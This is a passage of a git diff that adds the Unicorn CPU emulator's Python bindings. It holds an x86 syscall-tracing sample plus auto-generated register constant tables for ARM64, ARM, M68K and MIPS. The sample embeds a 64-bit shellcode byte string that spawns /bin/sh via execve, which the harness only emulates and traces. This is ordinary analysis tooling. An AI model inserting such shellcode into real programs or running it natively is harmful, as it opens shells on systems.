05 syscall +X86_CODE64 = b"\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05" + +# memory address where emulation starts +ADDRESS = 0x1000000 + +# callback for tracing instructions +def hook_code(uc, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" %(address, size)) + # read this instruction code from memory + tmp = uc.mem_read(address, size) + print("*** PC = %x *** :" %(address), end="") + for i in tmp: + print(" %02x" %i, end="") + print("") + + +# callback for tracing basic blocks +def hook_block(uc, address, size, user_data): + print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) + +def read_string(uc, address): + ret = "" + c = uc.mem_read(address, 1)[0] + read_bytes = 1 + + while c != 0x0: + ret += chr(c) + c = uc.mem_read(address + read_bytes, 1)[0] + read_bytes += 1 + return ret + +# callback for tracing Linux interrupt +def hook_intr(uc, intno, user_data): + # only handle Linux syscall + if intno != 0x80: + print("got interrupt %x ???" %intno); + uc.emu_stop() + return + + eax = uc.reg_read(UC_X86_REG_EAX) + eip = uc.reg_read(UC_X86_REG_EIP) + + if eax == 1: # sys_exit + print(">>> 0x%x: interrupt 0x%x, EAX = 0x%x" %(eip, intno, eax)) + uc.emu_stop() + elif eax == 4: # sys_write + # ECX = buffer address + ecx = uc.reg_read(UC_X86_REG_ECX) + # EDX = buffer size + edx = uc.reg_read(UC_X86_REG_EDX) + try: + buf = uc.mem_read(ecx, edx) + print(">>> 0x%x: interrupt 0x%x, SYS_WRITE. buffer = 0x%x, size = %u, content = " \ + %(eip, intno, ecx, edx), end="") + for i in buf: + print("%c" %i, end="") + print("") + except UcError as e: + print(">>> 0x%x: interrupt 0x%x, SYS_WRITE. buffer = 0x%x, size = %u, content = <unknown>\n" \ + %(eip, intno, ecx, edx)) + elif eax == 11: # sys_write + ebx = uc.reg_read(UC_X86_REG_EBX) + filename = read_string(uc, ebx) + print(">>> SYS_EXECV filename=%s" % filename) + else: + print(">>> 0x%x: interrupt 0x%x, EAX = 0x%x" %(eip, intno, eax)) + + +def hook_syscall32(mu, user_data): + eax = mu.reg_read(UC_X86_REG_EAX) + print(">>> got SYSCALL with EAX = 0x%x" %(eax)) + mu.emu_stop() + +def hook_syscall64(mu, user_data): + rax = mu.reg_read(UC_X86_REG_RAX) + rdi = mu.reg_read(UC_X86_REG_RDI) + + print(">>> got SYSCALL with RAX = %d" %(rax)) + + if rax == 59: #sys_execve + filename = read_string(mu, rdi) + print(">>> SYS_EXECV filename=%s" % filename) + + else: + rip = mu.reg_read(UC_X86_REG_RIP) + print(">>> Syscall Found at 0x%x: , RAX = 0x%x" %(rip, rax)) + + mu.emu_stop() + +# Test X86 32 bit +def test_i386(mode, code): + if mode == UC_MODE_32: + print("Emulate x86_32 code") + elif mode == UC_MODE_64: + print("Emulate x86_64 code") + + try: + # Initialize emulator + mu = Uc(UC_ARCH_X86, mode) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, code) + + # initialize stack + mu.reg_write(UC_X86_REG_ESP, ADDRESS + 0x200000) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code) + + if mode == UC_MODE_32: + # handle interrupt ourself + mu.hook_add(UC_HOOK_INTR, hook_intr) + # handle SYSCALL + mu.hook_add(UC_HOOK_INSN, hook_syscall32, None, 1, 0, UC_X86_INS_SYSCALL) + elif mode == UC_MODE_64: + mu.hook_add(UC_HOOK_INSN, hook_syscall64, None, 1, 0, UC_X86_INS_SYSCALL) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(code)) + + # now print out some registers + print(">>> Emulation done") + + except UcError as e: + print("ERROR: %s" % e) + +if __name__ == '__main__': + test_i386(UC_MODE_32, X86_CODE32_SELF) + print("=" * 20) + test_i386(UC_MODE_32, X86_CODE32) + print("=" * 20) + test_i386(UC_MODE_64, X86_CODE64) \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/__init__.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/__init__.py new file mode 100644 index 0000000..9d2b717 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/__init__.py @@ -0,0 +1,4 @@ +# Unicorn Python bindings, by Nguyen Anh Quynnh <aquynh@gmail.com> +from . import arm_const, arm64_const, mips_const, sparc_const, m68k_const, x86_const +from .unicorn_const import * +from .unicorn import Uc, uc_version, uc_arch_supported, version_bind, debug, UcError, __version__ diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/arm64_const.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/arm64_const.py new file mode 100644 index 0000000..ae8e77e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/arm64_const.py @@ -0,0 +1,311 @@ +# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [arm64_const.py] + +# ARM64 registers + +UC_ARM64_REG_INVALID = 0 +UC_ARM64_REG_X29 = 1 +UC_ARM64_REG_X30 = 2 +UC_ARM64_REG_NZCV = 3 +UC_ARM64_REG_SP = 4 +UC_ARM64_REG_WSP = 5 +UC_ARM64_REG_WZR = 6 +UC_ARM64_REG_XZR = 7 +UC_ARM64_REG_B0 = 8 +UC_ARM64_REG_B1 = 9 +UC_ARM64_REG_B2 = 10 +UC_ARM64_REG_B3 = 11 +UC_ARM64_REG_B4 = 12 +UC_ARM64_REG_B5 = 13 +UC_ARM64_REG_B6 = 14 +UC_ARM64_REG_B7 = 15 +UC_ARM64_REG_B8 = 16 +UC_ARM64_REG_B9 = 17 +UC_ARM64_REG_B10 = 18 +UC_ARM64_REG_B11 = 19 +UC_ARM64_REG_B12 = 20 +UC_ARM64_REG_B13 = 21 +UC_ARM64_REG_B14 = 22 +UC_ARM64_REG_B15 = 23 +UC_ARM64_REG_B16 = 24 +UC_ARM64_REG_B17 = 25 +UC_ARM64_REG_B18 = 26 +UC_ARM64_REG_B19 = 27 +UC_ARM64_REG_B20 = 28 +UC_ARM64_REG_B21 = 29 +UC_ARM64_REG_B22 = 30 +UC_ARM64_REG_B23 = 31 +UC_ARM64_REG_B24 = 32 +UC_ARM64_REG_B25 = 33 +UC_ARM64_REG_B26 = 34 +UC_ARM64_REG_B27 = 35 +UC_ARM64_REG_B28 = 36 +UC_ARM64_REG_B29 = 37 +UC_ARM64_REG_B30 = 38 +UC_ARM64_REG_B31 = 39 +UC_ARM64_REG_D0 = 40 +UC_ARM64_REG_D1 = 41 +UC_ARM64_REG_D2 = 42 +UC_ARM64_REG_D3 = 43 +UC_ARM64_REG_D4 = 44 +UC_ARM64_REG_D5 = 45 +UC_ARM64_REG_D6 = 46 +UC_ARM64_REG_D7 = 47 +UC_ARM64_REG_D8 = 48 +UC_ARM64_REG_D9 = 49 +UC_ARM64_REG_D10 = 50 +UC_ARM64_REG_D11 = 51 +UC_ARM64_REG_D12 = 52 +UC_ARM64_REG_D13 = 53 +UC_ARM64_REG_D14 = 54 +UC_ARM64_REG_D15 = 55 +UC_ARM64_REG_D16 = 56 +UC_ARM64_REG_D17 = 57 +UC_ARM64_REG_D18 = 58 +UC_ARM64_REG_D19 = 59 +UC_ARM64_REG_D20 = 60 +UC_ARM64_REG_D21 = 61 +UC_ARM64_REG_D22 = 62 +UC_ARM64_REG_D23 = 63 +UC_ARM64_REG_D24 = 64 +UC_ARM64_REG_D25 = 65 +UC_ARM64_REG_D26 = 66 +UC_ARM64_REG_D27 = 67 +UC_ARM64_REG_D28 = 68 +UC_ARM64_REG_D29 = 69 +UC_ARM64_REG_D30 = 70 +UC_ARM64_REG_D31 = 71 +UC_ARM64_REG_H0 = 72 +UC_ARM64_REG_H1 = 73 +UC_ARM64_REG_H2 = 74 +UC_ARM64_REG_H3 = 75 +UC_ARM64_REG_H4 = 76 +UC_ARM64_REG_H5 = 77 +UC_ARM64_REG_H6 = 78 +UC_ARM64_REG_H7 = 79 +UC_ARM64_REG_H8 = 80 +UC_ARM64_REG_H9 = 81 +UC_ARM64_REG_H10 = 82 +UC_ARM64_REG_H11 = 83 +UC_ARM64_REG_H12 = 84 +UC_ARM64_REG_H13 = 85 +UC_ARM64_REG_H14 = 86 +UC_ARM64_REG_H15 = 87 +UC_ARM64_REG_H16 = 88 +UC_ARM64_REG_H17 = 89 +UC_ARM64_REG_H18 = 90 +UC_ARM64_REG_H19 = 91 +UC_ARM64_REG_H20 = 92 +UC_ARM64_REG_H21 = 93 +UC_ARM64_REG_H22 = 94 +UC_ARM64_REG_H23 = 95 +UC_ARM64_REG_H24 = 96 +UC_ARM64_REG_H25 = 97 +UC_ARM64_REG_H26 = 98 +UC_ARM64_REG_H27 = 99 +UC_ARM64_REG_H28 = 100 +UC_ARM64_REG_H29 = 101 +UC_ARM64_REG_H30 = 102 +UC_ARM64_REG_H31 = 103 +UC_ARM64_REG_Q0 = 104 +UC_ARM64_REG_Q1 = 105 +UC_ARM64_REG_Q2 = 106 +UC_ARM64_REG_Q3 = 107 +UC_ARM64_REG_Q4 = 108 +UC_ARM64_REG_Q5 = 109 +UC_ARM64_REG_Q6 = 110 +UC_ARM64_REG_Q7 = 111 +UC_ARM64_REG_Q8 = 112 +UC_ARM64_REG_Q9 = 113 +UC_ARM64_REG_Q10 = 114 +UC_ARM64_REG_Q11 = 115 +UC_ARM64_REG_Q12 = 116 +UC_ARM64_REG_Q13 = 117 +UC_ARM64_REG_Q14 = 118 +UC_ARM64_REG_Q15 = 119 +UC_ARM64_REG_Q16 = 120 +UC_ARM64_REG_Q17 = 121 +UC_ARM64_REG_Q18 = 122 +UC_ARM64_REG_Q19 = 123 +UC_ARM64_REG_Q20 = 124 +UC_ARM64_REG_Q21 = 125 +UC_ARM64_REG_Q22 = 126 +UC_ARM64_REG_Q23 = 127 +UC_ARM64_REG_Q24 = 128 +UC_ARM64_REG_Q25 = 129 +UC_ARM64_REG_Q26 = 130 +UC_ARM64_REG_Q27 = 131 +UC_ARM64_REG_Q28 = 132 +UC_ARM64_REG_Q29 = 133 +UC_ARM64_REG_Q30 = 134 +UC_ARM64_REG_Q31 = 135 +UC_ARM64_REG_S0 = 136 +UC_ARM64_REG_S1 = 137 +UC_ARM64_REG_S2 = 138 +UC_ARM64_REG_S3 = 139 +UC_ARM64_REG_S4 = 140 +UC_ARM64_REG_S5 = 141 +UC_ARM64_REG_S6 = 142 +UC_ARM64_REG_S7 = 143 +UC_ARM64_REG_S8 = 144 +UC_ARM64_REG_S9 = 145 +UC_ARM64_REG_S10 = 146 +UC_ARM64_REG_S11 = 147 +UC_ARM64_REG_S12 = 148 +UC_ARM64_REG_S13 = 149 +UC_ARM64_REG_S14 = 150 +UC_ARM64_REG_S15 = 151 +UC_ARM64_REG_S16 = 152 +UC_ARM64_REG_S17 = 153 +UC_ARM64_REG_S18 = 154 +UC_ARM64_REG_S19 = 155 +UC_ARM64_REG_S20 = 156 +UC_ARM64_REG_S21 = 157 +UC_ARM64_REG_S22 = 158 +UC_ARM64_REG_S23 = 159 +UC_ARM64_REG_S24 = 160 +UC_ARM64_REG_S25 = 161 +UC_ARM64_REG_S26 = 162 +UC_ARM64_REG_S27 = 163 +UC_ARM64_REG_S28 = 164 +UC_ARM64_REG_S29 = 165 +UC_ARM64_REG_S30 = 166 +UC_ARM64_REG_S31 = 167 +UC_ARM64_REG_W0 = 168 +UC_ARM64_REG_W1 = 169 +UC_ARM64_REG_W2 = 170 +UC_ARM64_REG_W3 = 171 +UC_ARM64_REG_W4 = 172 +UC_ARM64_REG_W5 = 173 +UC_ARM64_REG_W6 = 174 +UC_ARM64_REG_W7 = 175 +UC_ARM64_REG_W8 = 176 +UC_ARM64_REG_W9 = 177 +UC_ARM64_REG_W10 = 178 +UC_ARM64_REG_W11 = 179 +UC_ARM64_REG_W12 = 180 +UC_ARM64_REG_W13 = 181 +UC_ARM64_REG_W14 = 182 +UC_ARM64_REG_W15 = 183 +UC_ARM64_REG_W16 = 184 +UC_ARM64_REG_W17 = 185 +UC_ARM64_REG_W18 = 186 +UC_ARM64_REG_W19 = 187 +UC_ARM64_REG_W20 = 188 +UC_ARM64_REG_W21 = 189 +UC_ARM64_REG_W22 = 190 +UC_ARM64_REG_W23 = 191 +UC_ARM64_REG_W24 = 192 +UC_ARM64_REG_W25 = 193 +UC_ARM64_REG_W26 = 194 +UC_ARM64_REG_W27 = 195 +UC_ARM64_REG_W28 = 196 +UC_ARM64_REG_W29 = 197 +UC_ARM64_REG_W30 = 198 +UC_ARM64_REG_X0 = 199 +UC_ARM64_REG_X1 = 200 +UC_ARM64_REG_X2 = 201 +UC_ARM64_REG_X3 = 202 +UC_ARM64_REG_X4 = 203 +UC_ARM64_REG_X5 = 204 +UC_ARM64_REG_X6 = 205 +UC_ARM64_REG_X7 = 206 +UC_ARM64_REG_X8 = 207 +UC_ARM64_REG_X9 = 208 +UC_ARM64_REG_X10 = 209 +UC_ARM64_REG_X11 = 210 +UC_ARM64_REG_X12 = 211 +UC_ARM64_REG_X13 = 212 +UC_ARM64_REG_X14 = 213 +UC_ARM64_REG_X15 = 214 +UC_ARM64_REG_X16 = 215 +UC_ARM64_REG_X17 = 216 +UC_ARM64_REG_X18 = 217 +UC_ARM64_REG_X19 = 218 +UC_ARM64_REG_X20 = 219 +UC_ARM64_REG_X21 = 220 +UC_ARM64_REG_X22 = 221 +UC_ARM64_REG_X23 = 222 +UC_ARM64_REG_X24 = 223 +UC_ARM64_REG_X25 = 224 +UC_ARM64_REG_X26 = 225 +UC_ARM64_REG_X27 = 226 +UC_ARM64_REG_X28 = 227 +UC_ARM64_REG_V0 = 228 +UC_ARM64_REG_V1 = 229 +UC_ARM64_REG_V2 = 230 +UC_ARM64_REG_V3 = 231 +UC_ARM64_REG_V4 = 232 +UC_ARM64_REG_V5 = 233 +UC_ARM64_REG_V6 = 234 +UC_ARM64_REG_V7 = 235 +UC_ARM64_REG_V8 = 236 +UC_ARM64_REG_V9 = 237 +UC_ARM64_REG_V10 = 238 +UC_ARM64_REG_V11 = 239 +UC_ARM64_REG_V12 = 240 +UC_ARM64_REG_V13 = 241 +UC_ARM64_REG_V14 = 242 +UC_ARM64_REG_V15 = 243 +UC_ARM64_REG_V16 = 244 +UC_ARM64_REG_V17 = 245 +UC_ARM64_REG_V18 = 246 +UC_ARM64_REG_V19 = 247 +UC_ARM64_REG_V20 = 248 +UC_ARM64_REG_V21 = 249 +UC_ARM64_REG_V22 = 250 +UC_ARM64_REG_V23 = 251 +UC_ARM64_REG_V24 = 252 +UC_ARM64_REG_V25 = 253 +UC_ARM64_REG_V26 = 254 +UC_ARM64_REG_V27 = 255 +UC_ARM64_REG_V28 = 256 +UC_ARM64_REG_V29 = 257 +UC_ARM64_REG_V30 = 258 +UC_ARM64_REG_V31 = 259 + +# pseudo registers +UC_ARM64_REG_PC = 260 +UC_ARM64_REG_CPACR_EL1 = 261 + +# thread registers +UC_ARM64_REG_TPIDR_EL0 = 262 +UC_ARM64_REG_TPIDRRO_EL0 = 263 +UC_ARM64_REG_TPIDR_EL1 = 264 +UC_ARM64_REG_PSTATE = 265 + +# exception link registers +UC_ARM64_REG_ELR_EL0 = 266 +UC_ARM64_REG_ELR_EL1 = 267 +UC_ARM64_REG_ELR_EL2 = 268 +UC_ARM64_REG_ELR_EL3 = 269 + +# stack pointers registers +UC_ARM64_REG_SP_EL0 = 270 +UC_ARM64_REG_SP_EL1 = 271 +UC_ARM64_REG_SP_EL2 = 272 +UC_ARM64_REG_SP_EL3 = 273 + +# other CP15 registers +UC_ARM64_REG_TTBR0_EL1 = 274 +UC_ARM64_REG_TTBR1_EL1 = 275 +UC_ARM64_REG_ESR_EL0 = 276 +UC_ARM64_REG_ESR_EL1 = 277 +UC_ARM64_REG_ESR_EL2 = 278 +UC_ARM64_REG_ESR_EL3 = 279 +UC_ARM64_REG_FAR_EL0 = 280 +UC_ARM64_REG_FAR_EL1 = 281 +UC_ARM64_REG_FAR_EL2 = 282 +UC_ARM64_REG_FAR_EL3 = 283 +UC_ARM64_REG_PAR_EL1 = 284 +UC_ARM64_REG_MAIR_EL1 = 285 +UC_ARM64_REG_VBAR_EL0 = 286 +UC_ARM64_REG_VBAR_EL1 = 287 +UC_ARM64_REG_VBAR_EL2 = 288 +UC_ARM64_REG_VBAR_EL3 = 289 +UC_ARM64_REG_ENDING = 290 + +# alias registers +UC_ARM64_REG_IP0 = 215 +UC_ARM64_REG_IP1 = 216 +UC_ARM64_REG_FP = 1 +UC_ARM64_REG_LR = 2 diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/arm_const.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/arm_const.py new file mode 100644 index 0000000..088eaa4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/arm_const.py @@ -0,0 +1,132 @@ +# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [arm_const.py] + +# ARM registers + +UC_ARM_REG_INVALID = 0 +UC_ARM_REG_APSR = 1 +UC_ARM_REG_APSR_NZCV = 2 +UC_ARM_REG_CPSR = 3 +UC_ARM_REG_FPEXC = 4 +UC_ARM_REG_FPINST = 5 +UC_ARM_REG_FPSCR = 6 +UC_ARM_REG_FPSCR_NZCV = 7 +UC_ARM_REG_FPSID = 8 +UC_ARM_REG_ITSTATE = 9 +UC_ARM_REG_LR = 10 +UC_ARM_REG_PC = 11 +UC_ARM_REG_SP = 12 +UC_ARM_REG_SPSR = 13 +UC_ARM_REG_D0 = 14 +UC_ARM_REG_D1 = 15 +UC_ARM_REG_D2 = 16 +UC_ARM_REG_D3 = 17 +UC_ARM_REG_D4 = 18 +UC_ARM_REG_D5 = 19 +UC_ARM_REG_D6 = 20 +UC_ARM_REG_D7 = 21 +UC_ARM_REG_D8 = 22 +UC_ARM_REG_D9 = 23 +UC_ARM_REG_D10 = 24 +UC_ARM_REG_D11 = 25 +UC_ARM_REG_D12 = 26 +UC_ARM_REG_D13 = 27 +UC_ARM_REG_D14 = 28 +UC_ARM_REG_D15 = 29 +UC_ARM_REG_D16 = 30 +UC_ARM_REG_D17 = 31 +UC_ARM_REG_D18 = 32 +UC_ARM_REG_D19 = 33 +UC_ARM_REG_D20 = 34 +UC_ARM_REG_D21 = 35 +UC_ARM_REG_D22 = 36 +UC_ARM_REG_D23 = 37 +UC_ARM_REG_D24 = 38 +UC_ARM_REG_D25 = 39 +UC_ARM_REG_D26 = 40 +UC_ARM_REG_D27 = 41 +UC_ARM_REG_D28 = 42 +UC_ARM_REG_D29 = 43 +UC_ARM_REG_D30 = 44 +UC_ARM_REG_D31 = 45 +UC_ARM_REG_FPINST2 = 46 +UC_ARM_REG_MVFR0 = 47 +UC_ARM_REG_MVFR1 = 48 +UC_ARM_REG_MVFR2 = 49 +UC_ARM_REG_Q0 = 50 +UC_ARM_REG_Q1 = 51 +UC_ARM_REG_Q2 = 52 +UC_ARM_REG_Q3 = 53 +UC_ARM_REG_Q4 = 54 +UC_ARM_REG_Q5 = 55 +UC_ARM_REG_Q6 = 56 +UC_ARM_REG_Q7 = 57 +UC_ARM_REG_Q8 = 58 +UC_ARM_REG_Q9 = 59 +UC_ARM_REG_Q10 = 60 +UC_ARM_REG_Q11 = 61 +UC_ARM_REG_Q12 = 62 +UC_ARM_REG_Q13 = 63 +UC_ARM_REG_Q14 = 64 +UC_ARM_REG_Q15 = 65 +UC_ARM_REG_R0 = 66 +UC_ARM_REG_R1 = 67 +UC_ARM_REG_R2 = 68 +UC_ARM_REG_R3 = 69 +UC_ARM_REG_R4 = 70 +UC_ARM_REG_R5 = 71 +UC_ARM_REG_R6 = 72 +UC_ARM_REG_R7 = 73 +UC_ARM_REG_R8 = 74 +UC_ARM_REG_R9 = 75 +UC_ARM_REG_R10 = 76 +UC_ARM_REG_R11 = 77 +UC_ARM_REG_R12 = 78 +UC_ARM_REG_S0 = 79 +UC_ARM_REG_S1 = 80 +UC_ARM_REG_S2 = 81 +UC_ARM_REG_S3 = 82 +UC_ARM_REG_S4 = 83 +UC_ARM_REG_S5 = 84 +UC_ARM_REG_S6 = 85 +UC_ARM_REG_S7 = 86 +UC_ARM_REG_S8 = 87 +UC_ARM_REG_S9 = 88 +UC_ARM_REG_S10 = 89 +UC_ARM_REG_S11 = 90 +UC_ARM_REG_S12 = 91 +UC_ARM_REG_S13 = 92 +UC_ARM_REG_S14 = 93 +UC_ARM_REG_S15 = 94 +UC_ARM_REG_S16 = 95 +UC_ARM_REG_S17 = 96 +UC_ARM_REG_S18 = 97 +UC_ARM_REG_S19 = 98 +UC_ARM_REG_S20 = 99 +UC_ARM_REG_S21 = 100 +UC_ARM_REG_S22 = 101 +UC_ARM_REG_S23 = 102 +UC_ARM_REG_S24 = 103 +UC_ARM_REG_S25 = 104 +UC_ARM_REG_S26 = 105 +UC_ARM_REG_S27 = 106 +UC_ARM_REG_S28 = 107 +UC_ARM_REG_S29 = 108 +UC_ARM_REG_S30 = 109 +UC_ARM_REG_S31 = 110 +UC_ARM_REG_C1_C0_2 = 111 +UC_ARM_REG_C13_C0_2 = 112 +UC_ARM_REG_C13_C0_3 = 113 +UC_ARM_REG_IPSR = 114 +UC_ARM_REG_MSP = 115 +UC_ARM_REG_PSP = 116 +UC_ARM_REG_CONTROL = 117 +UC_ARM_REG_ENDING = 118 + +# alias registers +UC_ARM_REG_R13 = 12 +UC_ARM_REG_R14 = 10 +UC_ARM_REG_R15 = 11 +UC_ARM_REG_SB = 75 +UC_ARM_REG_SL = 76 +UC_ARM_REG_FP = 77 +UC_ARM_REG_IP = 78 diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/m68k_const.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/m68k_const.py new file mode 100644 index 0000000..37b00b9 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/m68k_const.py @@ -0,0 +1,24 @@ +# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [m68k_const.py] + +# M68K registers + +UC_M68K_REG_INVALID = 0 +UC_M68K_REG_A0 = 1 +UC_M68K_REG_A1 = 2 +UC_M68K_REG_A2 = 3 +UC_M68K_REG_A3 = 4 +UC_M68K_REG_A4 = 5 +UC_M68K_REG_A5 = 6 +UC_M68K_REG_A6 = 7 +UC_M68K_REG_A7 = 8 +UC_M68K_REG_D0 = 9 +UC_M68K_REG_D1 = 10 +UC_M68K_REG_D2 = 11 +UC_M68K_REG_D3 = 12 +UC_M68K_REG_D4 = 13 +UC_M68K_REG_D5 = 14 +UC_M68K_REG_D6 = 15 +UC_M68K_REG_D7 = 16 +UC_M68K_REG_SR = 17 +UC_M68K_REG_PC = 18 +UC_M68K_REG_ENDING = 19 diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/mips_const.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/mips_const.py new file mode 100644 index 0000000..98e1ecc --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/mips_const.py @@ -0,0 +1,197 @@ +# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [mips_const.py] + +# MIPS registers + +UC_MIPS_REG_INVALID = 0 + +# General purpose registers +UC_MIPS_REG_PC = 1 +UC_MIPS_REG_0 = 2 +UC_MIPS_REG_1 = 3 +UC_MIPS_REG_2 = 4 +UC_MIPS_REG_3 = 5 +UC_MIPS_REG_4 = 6 +UC_MIPS_REG_5 = 7 +UC_MIPS_REG_6 = 8 +UC_MIPS_REG_7 = 9 +UC_MIPS_REG_8 = 10 +UC_MIPS_REG_9 = 11 +UC_MIPS_REG_10 = 12 +UC_MIPS_REG_11 = 13 +UC_MIPS_REG_12 = 14 +UC_MIPS_REG_13 = 15 +UC_MIPS_REG_14 = 16 +UC_MIPS_REG_15 = 17 +UC_MIPS_REG_16 = 18 +UC_MIPS_REG_17 = 19 +UC_MIPS_REG_18 = 20 +UC_MIPS_REG_19 = 21 +UC_MIPS_REG_20 = 22 +UC_MIPS_REG_21 = 23 +UC_MIPS_REG_22 = 24 +UC_MIPS_REG_23 = 25 +UC_MIPS_REG_24 = 26 +UC_MIPS_REG_25 = 27 +UC_MIPS_REG_26 = 28 +UC_MIPS_REG_27 = 29 +UC_MIPS_REG_28 = 30 +UC_MIPS_REG_29 = 31 +UC_MIPS_REG_30 = 32 +UC_MIPS_REG_31 = 33 + +# DSP registers +UC_MIPS_REG_DSPCCOND = 34 +UC_MIPS_REG_DSPCARRY = 35 +UC_MIPS_REG_DSPEFI = 36 +UC_MIPS_REG_DSPOUTFLAG = 37 +UC_MIPS_REG_DSPOUTFLAG16_19 = 38 +UC_MIPS_REG_DSPOUTFLAG20 = 39 +UC_MIPS_REG_DSPOUTFLAG21 = 40 +UC_MIPS_REG_DSPOUTFLAG22 = 41 +UC_MIPS_REG_DSPOUTFLAG23 = 42 +UC_MIPS_REG_DSPPOS = 43 +UC_MIPS_REG_DSPSCOUNT = 44 + +# ACC registers +UC_MIPS_REG_AC0 = 45 +UC_MIPS_REG_AC1 = 46 +UC_MIPS_REG_AC2 = 47 +UC_MIPS_REG_AC3 = 48 + +# COP registers +UC_MIPS_REG_CC0 = 49 +UC_MIPS_REG_CC1 = 50 +UC_MIPS_REG_CC2 = 51 +UC_MIPS_REG_CC3 = 52 +UC_MIPS_REG_CC4 = 53 +UC_MIPS_REG_CC5 = 54 +UC_MIPS_REG_CC6 = 55 +UC_MIPS_REG_CC7 = 56 + +# FPU registers +UC_MIPS_REG_F0 = 57 +UC_MIPS_REG_F1 = 58 +UC_MIPS_REG_F2 = 59 +UC_MIPS_REG_F3 = 60 +UC_MIPS_REG_F4 = 61 +UC_MIPS_REG_F5 = 62 +UC_MIPS_REG_F6 = 63 +UC_MIPS_REG_F7 = 64 +UC_MIPS_REG_F8 = 65 +UC_MIPS_REG_F9 = 66 +UC_MIPS_REG_F10 = 67 +UC_MIPS_REG_F11 = 68 +UC_MIPS_REG_F12 = 69 +UC_MIPS_REG_F13 = 70 +UC_MIPS_REG_F14 = 71 +UC_MIPS_REG_F15 = 72 +UC_MIPS_REG_F16 = 73 +UC_MIPS_REG_F17 = 74 +UC_MIPS_REG_F18 = 75 +UC_MIPS_REG_F19 = 76 +UC_MIPS_REG_F20 = 77 +UC_MIPS_REG_F21 = 78 +UC_MIPS_REG_F22 = 79 +UC_MIPS_REG_F23 = 80 +UC_MIPS_REG_F24 = 81 +UC_MIPS_REG_F25 = 82 +UC_MIPS_REG_F26 = 83 +UC_MIPS_REG_F27 = 84 +UC_MIPS_REG_F28 = 85 +UC_MIPS_REG_F29 = 86 +UC_MIPS_REG_F30 = 87 +UC_MIPS_REG_F31 = 88 +UC_MIPS_REG_FCC0 = 89 +UC_MIPS_REG_FCC1 = 90 +UC_MIPS_REG_FCC2 = 91 +UC_MIPS_REG_FCC3 = 92 +UC_MIPS_REG_FCC4 = 93 +UC_MIPS_REG_FCC5 = 94 +UC_MIPS_REG_FCC6 = 95 +UC_MIPS_REG_FCC7 = 96 + +# AFPR128 +UC_MIPS_REG_W0 = 97 +UC_MIPS_REG_W1 = 98 +UC_MIPS_REG_W2 = 99 +UC_MIPS_REG_W3 = 100 +UC_MIPS_REG_W4 = 101 +UC_MIPS_REG_W5 = 102 +UC_MIPS_REG_W6 = 103 +UC_MIPS_REG_W7 = 104 +UC_MIPS_REG_W8 = 105 +UC_MIPS_REG_W9 = 106 +UC_MIPS_REG_W10 = 107 +UC_MIPS_REG_W11 = 108 +UC_MIPS_REG_W12 = 109 +UC_MIPS_REG_W13 = 110 +UC_MIPS_REG_W14 = 111 +UC_MIPS_REG_W15 = 112 +UC_MIPS_REG_W16 = 113 +UC_MIPS_REG_W17 = 114 +UC_MIPS_REG_W18 = 115 +UC_MIPS_REG_W19 = 116 +UC_MIPS_REG_W20 = 117 +UC_MIPS_REG_W21 = 118 +UC_MIPS_REG_W22 = 119 +UC_MIPS_REG_W23 = 120 +UC_MIPS_REG_W24 = 121 +UC_MIPS_REG_W25 = 122 +UC_MIPS_REG_W26 = 123 +UC_MIPS_REG_W27 = 124 +UC_MIPS_REG_W28 = 125 +UC_MIPS_REG_W29 = 126 +UC_MIPS_REG_W30 = 127 +UC_MIPS_REG_W31 = 128 +UC_MIPS_REG_HI = 129 +UC_MIPS_REG_LO = 130 +UC_MIPS_REG_P0 = 131 +UC_MIPS_REG_P1 = 132 +UC_MIPS_REG_P2 = 133 +UC_MIPS_REG_MPL0 = 134 +UC_MIPS_REG_MPL1 = 135 +UC_MIPS_REG_MPL2 = 136 +UC_MIPS_REG_CP0_CONFIG3 = 137 +UC_MIPS_REG_CP0_USERLOCAL = 138 +UC_MIPS_REG_ENDING = 139 +UC_MIPS_REG_ZERO = 2 +UC_MIPS_REG_AT = 3 +UC_MIPS_REG_V0 = 4 +UC_MIPS_REG_V1 = 5 +UC_MIPS_REG_A0 = 6 +UC_MIPS_REG_A1 = 7 +UC_MIPS_REG_A2 = 8 +UC_MIPS_REG_A3 = 9 +UC_MIPS_REG_T0 = 10 +UC_MIPS_REG_T1 = 11 +UC_MIPS_REG_T2 = 12 +UC_MIPS_REG_T3 = 13 +UC_MIPS_REG_T4 = 14 +UC_MIPS_REG_T5 = 15 +UC_MIPS_REG_T6 = 16 +UC_MIPS_REG_T7 = 17 +UC_MIPS_REG_S0 = 18 +UC_MIPS_REG_S1 = 19 +UC_MIPS_REG_S2 = 20 